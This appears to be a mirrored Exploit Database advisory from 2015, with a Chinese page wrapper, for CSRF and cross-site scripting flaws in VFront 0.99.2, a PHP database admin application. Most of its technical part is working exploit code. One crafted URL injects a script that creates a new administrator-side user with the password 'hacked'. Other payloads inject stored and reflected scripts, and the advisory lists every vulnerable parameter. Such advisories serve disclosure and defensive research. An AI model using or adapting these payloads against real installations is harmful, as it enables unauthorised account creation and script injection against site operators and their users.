VFront 0.99.2 – Cross-Site Request Forgery / Persistent Cross-Site Scripting

• Exploit Database
• 117 阅读

• 作者： hyp3rlinx
  日期： 2015-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37186/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132

  # Exploit Title:CSRF & Persistent XSS # Google Dork: intitle: CSRF & Persistent XSS # Date: 2015-06-02 # Exploit Author:John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org/ # Vendor Homepage: www.vfront.org # Software Link: www.vfront.org # Version: 0.99.2 # Tested on: windows 7 # Category: webapps     Product: =================================================================================== vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.       Advisory Information: ==================================== CSRF, Persistent XSS & reflected XSS       Vulnerability Detail(s): =======================     CSRF: ========= No CSRF token in place, therefore we can add arbitrary users to the system.     Persistent XSS: ================ variabili.php has multiple XSS vectors using POST method, one input field &apos;altezza_iframe_tabella_gid&apos; will store XSS payload into the MySQL database which will be run each time variabili.php is accessed from victims browser.     Persisted XSS stored in MySQL DB: ================================= DB-----> vfront_vfront TABLE-----> variabili COLUMN------> valore (will contain our XSS)     Exploit code(s): ===============     CSRF code add arbitrary users to system: ======================================= http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open(&apos;POST&apos;,&apos;utenze.db.php?insert_new&apos;,true);xhr.setRequestHeader(&apos;Content-type&apos;,&apos;application/x-www-form-urlencoded&apos;);xhr.send(&apos;nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked&apos;);</script>&tabella=&uid=&data_dal=All&data_al=All       Persistent XSS: ================ http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0 Inject XSS into &apos;the altezza_iframe_tabella_gid&apos; input field to store in database. "/><script>alert(666)</script>       Reflected XSS(s): ================= http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>       XSS vulnerable input fields: ============================ http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php altezza_iframe_tabella_gid <------------- ( Persistent XSS ) passo_avanzamento_veloce_gid n_record_tabella_gid search_limit_results_gid max_tempo_edit_gid home_redirect_gid formati_attach_gid default_group_ext_gid cron_days_min_gid       Disclosure Timeline: ===================================     Vendor Notification: May 31, 2015 June 2, 2015 : Public Disclosure       Severity Level: =================================== High       Description: ==========================================================   Request Method(s): [+]GET & POST   Vulnerable Product: [+]vfront-0.99.2   Vulnerable Parameter(s): [+] altezza_iframe_tabella_gid passo_avanzamento_veloce_gid n_record_tabella_gid search_limit_results_gid max_tempo_edit_gid home_redirect_gid formati_attach_gid default_group_ext_gid cron_days_min_gid id_campo op     Affected Area(s): [+]Admin & MySQL DB   ===============================================================       (hyp3rlinx)